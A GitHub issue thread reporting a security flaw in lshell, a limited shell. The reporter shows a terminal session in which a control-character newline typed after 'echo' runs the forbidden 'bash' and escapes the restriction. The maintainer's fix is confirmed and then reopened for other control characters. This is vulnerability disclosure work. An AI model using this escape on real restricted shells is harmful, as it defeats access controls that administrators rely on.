### ISSUE TITLE
SECURITY ISSUE: Escape possible using special keys

### ISSUE THREAD

**Issue by Snawoot** [ghantoos/lshell#149]
Just type `<CTRL+V><CTRL+J>` after any allowed command and then type desired restricted command:
```
vladislav@dt1:~$ getent passwd testuser
testuser:x:1001:1002:,,,:/home/testuser:/usr/bin/lshell
vladislav@dt1:~$ su - testuser
Password: 
You are in a limited shell.
Type '?' or 'help' to get the list of allowed commands
testuser:~$ ?
cd  clear  echo  exit  help  history  ll  lpath  ls  lsudo
testuser:~$ bash
*** forbidden command: bash
testuser:~$ echo<CTRL+V><CTRL+J>
bash

testuser@dt1:~$ which bash
/bin/bash

```

**Comment by ghantoos** [comment]
Hi @Snawoot!

Thanks for reporting these major security issues. I am unfortunately away from my PC until tomorrow night. I'll do my best to work on this asap. 

I also saw your Debian bug reports, as I am the Debian maintainer for lshell. 

Cheers!

**Comment by ghantoos** [comment]
@Snawoot can you confirm that this fixes the issue you reported? Thanks! :)

**Comment by Snawoot** [comment]
@ghantoos Fix confirmed, thank you!

**Comment by ghantoos** [comment]
Reopening as issue is still there, using other control characters. See #148.
